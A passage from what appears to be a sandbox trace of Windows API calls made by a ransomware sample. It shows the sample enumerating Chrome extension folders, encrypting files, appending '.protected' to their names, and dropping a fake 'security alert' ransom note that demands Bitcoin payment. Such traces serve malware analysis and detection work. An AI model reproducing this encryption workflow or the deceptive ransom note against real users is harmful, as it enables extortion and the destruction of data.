(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.719] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.719] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.719] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.719] CloseHandle (hObject=0x164) returned 1 [0080.719] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0080.719] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0080.719] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0080.719] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th") returned 141 [0080.719] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0080.719] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0080.719] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\*") returned 143 [0080.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.720] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.720] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.720] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.720] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.720] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\.") returned 143 [0080.720] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.720] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.720] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.720] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.720] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.720] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.720] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\..") returned 144 [0080.720] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.720] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.720] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.720] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0080.720] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.720] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.720] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.720] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0080.721] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0080.721] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.721] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0080.721] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.721] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0080.722] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.722] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x125, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0080.722] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.722] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.722] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.722] CloseHandle (hObject=0x168) returned 1 [0080.722] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.protected") returned 165 [0080.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.protected")) returned 1 [0080.723] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.723] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.723] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0080.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.723] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.723] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.724] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.724] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.724] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.724] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.724] CloseHandle (hObject=0x164) returned 1 [0080.724] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0080.724] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0080.725] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0080.725] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr") returned 141 [0080.725] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0080.725] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0080.725] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\*") returned 143 [0080.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.728] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.728] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.728] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.728] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.728] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.728] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\.") returned 143 [0080.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.728] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.728] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.728] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.728] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.728] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.728] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\..") returned 144 [0080.728] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.728] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.728] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.728] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0080.728] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.728] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.728] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.728] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0080.729] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0080.729] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0080.729] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.729] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcd, lpOverlapped=0x0) returned 1 [0080.730] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.730] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcd, lpOverlapped=0x0) returned 1 [0080.730] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.730] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.730] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.730] CloseHandle (hObject=0x168) returned 1 [0080.730] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.protected") returned 165 [0080.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.protected")) returned 1 [0080.731] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.731] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0080.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.731] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.731] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.732] lstrlenA 